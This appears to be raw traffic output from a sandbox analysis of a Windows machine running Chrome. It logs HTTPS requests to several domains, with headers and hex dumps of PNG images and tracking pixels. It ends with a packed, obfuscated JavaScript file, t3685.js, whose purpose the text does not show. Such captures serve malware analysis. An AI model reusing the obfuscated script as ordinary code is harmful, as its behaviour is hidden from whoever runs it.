                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 8108
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:58 GMT
                                                                                                                                                          ETag: "5d71fe8a-1fac"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[2],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE3[1135],EU-GER-frankfurt-GLOBAL1-CACHE3[0,TCP_HIT,1133],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465113
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3b60e672e100b6a589f708cf28dacb2f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105843
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC8108INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4c 00 00 00 48 08 06 00 00 00 5c 06 13 3d 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 1e c3 49 44 41 54 78 da cd 9c 79 bc 65 57 55 e7 bf 6b ef 7d ce 1d de 7b f5 aa 5e 55 65 60 50 20 8a 40 a3 32 a8 dd d8 82 a2 e2 c0 18 86 10 20 21 21 40 80 24 40 98 5a 5a 5a 30 88 f6 47 04 82 4c 49 88 11 64 ca 40 13 06 09 20 42 23 6d 03 22 a1 41 10 99 44 a0 03 24 95 4a aa ea 8d 77 38 67 ef b5 fa 8f 7d ce bd f7 bd 7a 95 c1 54 f1 e9 9d cf ad fb ee cd b9 67 af bd f6 da 6b fd d6 74 84 3b 30 1c 50 8a a0 66 78 1c 43 df 87 f9 3d 3c
                                                                                                                                                          Data Ascii: PNGIHDRLH\=gAMAa cHRMz&u0`:pQ<bKGDIDATxyeWUk}{^Ue`P @2 !!@$@ZZZ0GLId@ B#m"AD$Jw8g}zTgkt;0PfxC=<


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          397192.168.2.55016490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC386OUTGET /pc/image-pc/index/312/service/icon_kuaijie.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 12833
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:57 GMT
                                                                                                                                                          ETag: "5d71fe89-3221"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[2],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE1[3],EU-FRA-paris-GLOBAL1-CACHE27[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465112
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9d909e6d8a04defb1106407097e92a99
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126892
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC12833INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 4e 08 06 00 00 00 b7 cd 91 46 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 31 38 49 44 41 54 78 da d5 bc 79 bc 57 55 bd ff ff 5c 6b ed bd 3f e3 19 99 04 d4 32 cd cc bc d9 ed 96 a5 75 bd a5 39 9b 23 8a 38 4f c8 20 60 8a 62 08 ca 28 02 4e 80 20 20 82 22 2a 2a ce 24 6a 66 dd ea 5a 76 cd 06 cb ba 96 43 2a 28 c3 19 3f e3 fe ec bd 86 df 1f fb 73 0e 07 24 b3 ec fe be df ef 7a 3c f6 e3 9c b3 cf 1e d6 7e af f7 7a ad f7 fb f5 7e bf 97 e0 43 9a 04 44 fd 77 c3 f6 3f a4 03 0f 70 40 2c ea e7 ad 04 6c 72 81 02
                                                                                                                                                          Data Ascii: PNGIHDRPNFgAMAa cHRMz&u0`:pQ<bKGD18IDATxyWU\k?2u9#8O `b(N "**$jfZvC*(?s$z<~z~CDw?p@,lr


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          398192.168.2.55016590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC359OUTGET /cc.png?r=8285707295 HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC574INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE21[285],EU-FRA-paris-GLOBAL1-CACHE6[281,TCP_MISS,284],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f119d57706ad801ad52d2944fcd9746a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 5
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          399192.168.2.55016623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC362OUTGET /cc.png?r=5735666541 HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC606INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[286],EU-GER-frankfurt-EDGE4-CACHE1[282,TCP_MISS,284],EU-FRA-paris-GLOBAL1-CACHE10[274],EU-FRA-paris-GLOBAL1-CACHE2[269,TCP_MISS,272],1.1 google
                                                                                                                                                          X-CCDN-Origin-Time: 266
                                                                                                                                                          x-hcs-proxy-type: 0
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 8c809c054c0d8c57a17d28a31d55e242
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          400192.168.2.55015954.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC542OUTGET /pc/240516-03/static/js/t3685.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC359INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          ETag: "6645cb17-c54c"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:00:07 GMT
                                                                                                                                                          Content-Length: 50508
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 17312260874764415232
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC1127INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 4a 67 42 59 42 4f 41 58 51 42 6f 42 76 41 49 67 47 6f 41 4f 57 67 5a 6d 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 6c 37 6b 30 35 45 41 45 70 4b 41 4e 79 67 41 6e 41 41 51 6f 41 33 43 67 43 38 58 48 67 4b 46 54 71 6e 4a 43 41 56 4a 65 63 2f 6e 32 72 4c 5a 69 6b 57 6a 57 55 30 55 41 4c 59 68 57 31 41 46 34 41 4c 41 50 6f 42 68 41 48 4c 55 35 4d 35 49 53 46 41 41 35 69 42 49 72 4a 52 51 37 4c 77 67 63 68 7a 63 66 49 4a 6f 77 71 4a 53 63 69 43 38 6e 48 4a 6f 31 41 70 30 76 4c 54 55 67 4b 50 36 67 4e 34 5a 67 42 54 71 64 47 6a 59 41 41 79 6b 4a 59 44 53 63 6f 42 77 4b 74 51 41 76 75 52 51 41 44 59 51 48 6c 42 65 41 43 5a 51 53 42 35 4a
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgBYBOAXQBoBvAIgGoAOWgZmoC4AzAVzRgBcBLdJl7k05EAEpKANygAnAAQoA3CgC8XHgKFTqnJCAVJec/n2rLZikWjWU0UALYhW1AF4ALAPoBhAHLU5M5ISFAA5iBIrJRQ7LwgchzcfIJowqJSciC8nHJo1Ap0vLTUgKP6gN4ZgBTqdGjYAAykJYDScoBwKtQAvuRQADYQHlBeACZQSB5J
                                                                                                                                                          2024-06-09 22:41:12 UTC4096INData Raw: 49 4f 6a 4a 37 46 68 67 6f 42 57 64 49 34 2f 42 6f 4d 56 50 52 6c 53 6c 6b 32 52 54 6c 54 55 74 65 52 31 41 43 6d 67 4b 43 38 46 34 36 31 68 57 6c 75 6e 59 66 35 51 55 6e 58 38 43 52 6d 46 64 31 58 70 54 79 47 7a 77 76 79 48 78 5a 42 45 79 56 57 62 69 75 30 6b 6d 32 67 41 48 70 6e 4a 41 70 5a 41 41 6a 70 77 72 6f 67 42 36 2f 31 54 4f 46 34 49 6b 6e 65 46 53 50 67 4b 74 46 75 4f 56 34 31 6f 54 49 4b 34 67 4f 51 4b 44 6b 50 77 6d 36 76 62 70 33 6c 31 66 4d 4a 37 72 68 61 42 4e 71 4c 67 64 52 45 45 54 61 6a 6a 6d 6f 56 4e 2b 48 38 51 70 79 43 65 45 68 6e 69 67 45 68 41 58 55 72 41 41 4c 4a 56 68 34 43 4c 73 4e 30 4b 43 69 70 67 49 75 38 47 4c 6b 74 68 4e 7a 41 44 30 73 76 79 79 67 69 74 38 31 65 75 42 6e 69 65 4b 75 69 77 69 45 41 6f 4d 41 6d 43 45 2f 77 45
                                                                                                                                                          Data Ascii: IOjJ7FhgoBWdI4/BoMVPRlSlk2RTlTUteR1ACmgKC8F461hWlunYf5QUnX8CRmFd1XpTyGzwvyHxZBEyVWbiu0km2gAHpnJApZAAjpwrogB6/1TOF4IkneFSPgKtFuOV41oTIK4gOQKDkPwm6vbp3l1fMJ7rhaBNqLgdREETajjmoVN+H8QpyCeEhnigEhAXUrAALJVh4CLsN0KCipgIu8GLkthNzAD0svyygit81euBnieKuiwiEAoMAmCE/wE
                                                                                                                                                          2024-06-09 22:41:12 UTC4096INData Raw: 2b 77 2b 61 71 51 4a 41 4e 43 64 6f 62 4d 6f 6d 52 61 6e 63 36 57 6c 61 74 47 68 69 2f 41 59 57 72 61 48 47 38 67 4d 57 68 57 38 61 42 51 4d 57 79 67 66 41 4c 71 72 53 6d 63 46 6d 55 79 71 61 72 49 51 59 53 4d 33 55 47 4d 6a 77 47 63 52 79 33 73 46 79 75 65 64 79 7a 41 42 6d 6a 53 6d 79 6a 69 37 77 78 79 37 67 64 32 32 47 57 4b 72 36 31 49 5a 32 34 61 6a 57 33 6d 7a 4d 36 57 50 30 78 69 74 63 53 61 34 55 43 53 79 32 37 65 61 32 32 4d 34 4d 37 53 71 5a 58 59 70 53 6b 51 4b 4f 39 67 47 4f 70 41 64 4d 36 69 30 30 38 32 79 53 39 63 4a 55 37 6f 48 57 6c 4d 42 51 61 6d 70 69 62 79 72 69 67 4d 31 61 78 7a 4a 72 45 41 62 77 71 6d 56 55 73 72 4f 63 4f 71 74 42 57 75 2b 75 6c 55 6b 53 36 57 73 51 4f 2b 45 2b 64 6f 49 71 2b 4c 50 45 56 43 69 6d 36 71 5a 51 44 75 38
                                                                                                                                                          Data Ascii: +w+aqQJANCdobMomRanc6WlatGhi/AYWraHG8gMWhW8aBQMWygfALqrSmcFmUyqarIQYSM3UGMjwGcRy3sFyuedyzABmjSmyji7wxy7gd22GWKr61IZ24ajW3mzM6WP0xitcSa4UCSy27ea22M4M7SqZXYpSkQKO9gGOpAdM6i0082yS9cJU7oHWlMBQampibyrigM1axzJrEAbwqmVUsrOcOqtBWu+ulUkS6WsQO+E+doIq+LPEVCim6qZQDu8
                                                                                                                                                          2024-06-09 22:41:12 UTC4480INData Raw: 69 45 4a 6f 49 75 55 51 46 4d 66 37 55 69 47 78 39 4d 56 59 59 42 4b 77 6e 34 42 43 78 53 49 76 59 53 5a 50 61 45 49 54 4f 78 30 45 67 79 65 73 4b 62 48 4f 6a 4e 68 5a 59 38 79 59 68 4b 71 6e 53 54 45 5a 4b 77 70 34 66 5a 4a 75 47 38 54 46 52 56 43 41 4d 54 69 50 32 45 67 6a 30 52 47 6b 31 79 57 70 4c 31 48 4c 53 36 4a 39 4d 4a 63 5a 6f 6a 63 41 46 41 46 41 52 51 70 57 46 41 4e 36 47 69 78 2b 68 30 44 51 59 63 4d 4e 47 45 6b 69 77 68 6b 77 6a 73 55 51 46 53 6d 52 6a 4a 43 75 45 36 6b 62 38 4c 6a 46 79 69 6a 68 42 34 37 34 57 69 4f 49 42 4e 6a 71 52 38 49 70 34 57 72 4c 4f 45 50 6a 4e 5a 63 6f 31 63 59 42 4a 37 45 6b 69 56 4a 41 49 75 34 51 76 6c 6f 54 34 41 33 52 72 77 2b 67 5a 35 49 43 37 76 54 31 68 2b 30 2b 67 56 47 4f 6d 6d 50 38 2f 68 62 51 76 30 66
                                                                                                                                                          Data Ascii: iEJoIuUQFMf7UiGx9MVYYBKwn4BCxSIvYSZPaEITOx0EgyesKbHOjNhZY8yYhKqnSTEZKwp4fZJuG8TFRVCAMTiP2Egj0RGk1yWpL1HLS6J9MJcZojcAFAFARQpWFAN6Gix+h0DQYcMNGEkiwhkwjsUQFSmRjJCuE6kb8LjFyijhB474WiOIBNjqR8Ip4WrLOEPjNZco1cYBJ7EkiVJAIu4QvloT4A3Rrw+gZ5IC7vT1h+0+gVGOmmP8/hbQv0f
                                                                                                                                                          2024-06-09 22:41:12 UTC4096INData Raw: 43 4f 33 46 4d 47 4e 39 47 4e 67 74 51 39 65 31 32 2b 79 38 44 4e 42 38 69 2f 79 4d 6f 76 54 48 56 35 6d 70 78 2f 55 77 47 4f 57 6c 36 53 7a 73 31 6c 74 63 68 73 72 6b 6b 4b 56 6c 70 6f 69 73 7a 35 4f 4e 45 43 58 78 35 4e 77 6c 61 7a 54 72 69 4e 49 48 78 35 72 49 79 63 7a 65 66 54 45 39 58 61 62 37 30 2f 51 31 71 64 41 6d 53 54 6e 54 39 38 30 57 32 2f 70 57 58 54 4b 75 44 4e 47 30 63 30 41 62 33 46 5a 7a 55 62 51 42 71 78 63 4d 70 50 4f 68 47 51 7a 62 31 30 61 54 2b 59 37 31 67 4b 56 52 34 38 6b 67 4b 2b 63 59 6e 70 69 48 78 42 56 39 72 55 4d 74 2b 57 42 6d 55 45 54 71 6a 73 38 35 5a 78 73 64 48 35 39 52 52 68 76 64 56 63 4c 48 63 58 30 52 56 74 36 65 51 46 6f 38 6b 54 61 68 59 41 58 61 4f 62 4d 76 77 76 43 4c 54 70 72 2b 76 4a 58 31 4d 41 6e 59 6a 32 6a
                                                                                                                                                          Data Ascii: CO3FMGN9GNgtQ9e12+y8DNB8i/yMovTHV5mpx/UwGOWl6Szs1ltchsrkkKVlpoisz5ONECXx5NwlazTriNIHx5rIyczefTE9Xab70/Q1qdAmSTnT980W2/pWXTKuDNG0c0Ab3FZzUbQBqxcMpPOhGQzb10aT+Y71gKVR48kgK+cYnpiHxBV9rUMt+WBmUETqjs85ZxsdH59RRhvdVcLHcX0RVt6eQFo8kTahYAXaObMvwvCLTpr+vJX1MAnYj2j
                                                                                                                                                          2024-06-09 22:41:12 UTC1536INData Raw: 6c 65 77 30 45 58 37 44 31 68 4e 69 50 6b 6a 64 5a 4a 67 42 67 41 65 51 74 59 32 62 43 33 74 51 47 57 56 6c 66 46 42 37 78 2b 56 46 77 37 48 79 72 43 6e 67 68 75 32 69 31 4c 70 50 38 4b 7a 43 53 52 48 4d 50 56 44 38 77 69 30 4b 54 43 33 58 4d 6b 54 34 39 4f 5a 4b 47 77 37 43 75 4e 5a 4d 4c 65 44 72 2f 45 49 4b 75 56 43 7a 4f 4c 52 70 30 30 56 51 69 4e 35 30 55 52 62 59 4b 68 6c 36 50 64 45 58 2f 45 4b 44 50 30 4c 72 45 48 78 4a 56 53 44 44 52 7a 56 68 52 41 4d 67 5a 41 45 55 64 44 6b 33 45 73 57 42 44 69 66 45 41 7a 2b 45 31 67 39 48 46 50 4d 4a 33 48 30 49 78 44 37 44 49 43 51 4c 43 33 39 58 69 57 32 6c 62 62 61 34 58 66 4d 62 46 64 46 58 64 45 53 4c 47 53 4c 34 39 6e 39 56 30 32 59 69 54 31 4b 65 52 50 43 47 35 52 55 4c 56 43 46 51 36 45 56 75 44 4b 6f
                                                                                                                                                          Data Ascii: lew0EX7D1hNiPkjdZJgBgAeQtY2bC3tQGWVlfFB7x+VFw7HyrCnghu2i1LpP8KzCSRHMPVD8wi0KTC3XMkT49OZKGw7CuNZMLeDr/EIKuVCzOLRp00VQiN50URbYKhl6PdEX/EKDP0LrEHxJVSDDRzVhRAMgZAEUdDk3EsWBDifEAz+E1g9HFPMJ3H0IxD7DICQLC39XiW2lbba4XfMbFdFXdESLGSL49n9V02YiT1KeRPCG5RULVCFQ6EVuDKo
                                                                                                                                                          2024-06-09 22:41:12 UTC2816INData Raw: 61 5a 4f 42 43 6d 34 71 68 42 63 6a 66 35 61 61 49 4f 53 68 6b 6a 30 31 48 30 35 6b 74 69 30 39 74 4d 6a 42 36 50 7a 64 53 44 53 51 52 39 43 4d 35 61 30 33 72 74 63 6e 62 4c 53 4f 6c 34 72 49 50 57 38 69 76 77 39 58 57 65 54 38 33 4c 38 57 53 55 5a 6b 6c 54 7a 42 46 48 34 76 65 4b 50 56 51 6b 2b 67 43 77 39 75 4e 61 53 32 32 4d 42 51 2f 38 58 6c 6a 30 70 44 30 54 43 64 2b 6b 6e 70 55 41 6c 56 4a 59 45 4a 4b 6c 49 55 77 71 49 68 77 66 6b 37 55 79 71 6b 68 4e 50 53 33 75 45 43 55 2b 69 78 75 46 48 34 2f 4b 4c 65 54 35 66 4c 42 55 56 73 62 7a 66 4e 57 75 53 73 6b 77 62 52 70 31 68 4c 43 67 32 47 46 43 6c 53 57 30 68 4d 54 6b 67 6f 78 2b 46 7a 6b 73 6b 52 50 31 6a 49 2b 65 4e 6e 6b 63 55 34 4a 56 77 31 4d 6b 75 61 4f 47 46 66 45 73 4a 49 43 39 59 76 58 46 49
                                                                                                                                                          Data Ascii: aZOBCm4qhBcjf5aaIOShkj01H05kti09tMjB6PzdSDSQR9CM5a03rtcnbLSOl4rIPW8ivw9XWeT83L8WSUZklTzBFH4veKPVQk+gCw9uNaS22MBQ/8Xlj0pD0TCd+knpUAlVJYEJKlIUwqIhwfk7UyqkhNPS3uECU+ixuFH4/KLeT5fLBUVsbzfNWuSskwbRp1hLCg2GFClSW0hMTkgox+FzkskRP1jI+eNnkcU4JVw1MkuaOGFfEsJIC9YvXFI
                                                                                                                                                          2024-06-09 22:41:12 UTC4096INData Raw: 55 73 69 53 55 6f 59 53 45 44 31 52 63 6b 58 7a 73 47 70 65 31 50 54 6b 42 66 41 63 52 53 69 57 5a 5a 7a 4c 53 4b 75 39 65 7a 57 75 4b 77 52 56 51 73 4d 63 4b 6a 53 46 4f 76 74 74 54 4a 64 31 6b 55 36 50 5a 73 51 31 39 34 6e 63 75 31 2b 45 74 38 6b 6b 58 59 38 6c 52 47 43 57 57 6b 64 54 61 6d 55 61 56 50 53 70 37 51 76 6c 65 64 44 53 51 6d 38 73 69 33 4b 55 53 6a 4d 37 44 30 7a 68 6c 71 5a 4f 70 57 4c 45 46 38 45 4d 57 46 46 6e 39 58 7a 7a 59 73 30 55 6d 39 4d 74 4d 4d 73 4b 76 30 73 6c 36 6c 47 69 57 79 30 50 51 31 4e 51 35 46 34 70 54 6b 53 70 30 47 39 55 54 32 4e 4b 62 44 58 46 33 36 64 32 41 77 75 51 42 46 75 35 58 38 78 4a 45 32 34 6e 71 51 73 6c 51 4c 45 4f 57 2f 44 50 50 48 56 78 42 43 46 64 4c 42 41 2b 63 42 78 66 5a 58 49 55 43 58 5a 74 57 31 55
                                                                                                                                                          Data Ascii: UsiSUoYSED1RckXzsGpe1PTkBfAcRSiWZZzLSKu9ezWuKwRVQsMcKjSFOvttTJd1kU6PZsQ194ncu1+Et8kkXY8lRGCWWkdTamUaVPSp7QvledDSQm8si3KUSjM7D0zhlqZOpWLEF8EMWFFn9XzzYs0Um9MtMMsKv0sl6lGiWy0PQ1NQ5F4pTkSp0G9UT2NKbDXF36d2AwuQBFu5X8xJE24nqQslQLEOW/DPPHVxBCFdLBA+cBxfZXIUCXZtW1U
                                                                                                                                                          2024-06-09 22:41:12 UTC4096INData Raw: 50 63 46 38 50 74 49 58 78 4b 46 59 45 53 4f 6c 50 42 7a 6b 50 34 47 51 44 53 35 49 69 69 50 6b 38 64 57 57 45 33 69 2f 7a 74 43 47 7a 64 4c 54 52 6b 48 6a 42 74 4d 50 6d 6c 78 62 44 43 32 34 6c 45 68 32 49 66 38 55 72 4e 47 6a 51 53 47 79 6c 51 77 66 37 56 32 74 4e 51 59 6b 47 68 74 63 46 74 45 37 52 42 69 50 73 38 30 71 42 32 41 5a 57 45 63 41 73 64 58 56 4d 58 74 4f 6f 33 73 47 33 56 61 70 54 48 63 55 4e 42 6f 59 4a 31 2b 31 4d 63 42 38 42 33 4a 64 64 52 31 56 33 6a 56 55 51 74 4c 37 74 44 43 77 32 46 2b 42 6c 59 56 61 48 6e 4e 41 36 54 64 55 52 42 7a 52 56 6f 31 4f 68 55 34 55 68 79 33 52 62 31 54 32 63 78 38 76 56 58 7a 69 7a 33 64 58 53 45 56 36 44 50 59 58 7a 36 78 77 43 4e 6b 79 56 31 42 6e 77 45 32 48 4e 5a 59 72 53 4c 56 71 74 49 44 55 4a 38 71
                                                                                                                                                          Data Ascii: PcF8PtIXxKFYESOlPBzkP4GQDS5IiiPk8dWWE3i/ztCGzdLTRkHjBtMPmlxbDC24lEh2If8UrNGjQSGylQwf7V2tNQYkGhtcFtE7RBiPs80qB2AZWEcAsdXVMXtOo3sG3VapTHcUNBoYJ1+1McB8B3JddR1V3jVUQtL7tDCw2F+BlYVaHnNA6TdURBzRVo1OhU4Uhy3Rb1T2cx8vVXziz3dXSEV6DPYXz6xwCNkyV1BnwE2HNZYrSLVqtIDUJ8q
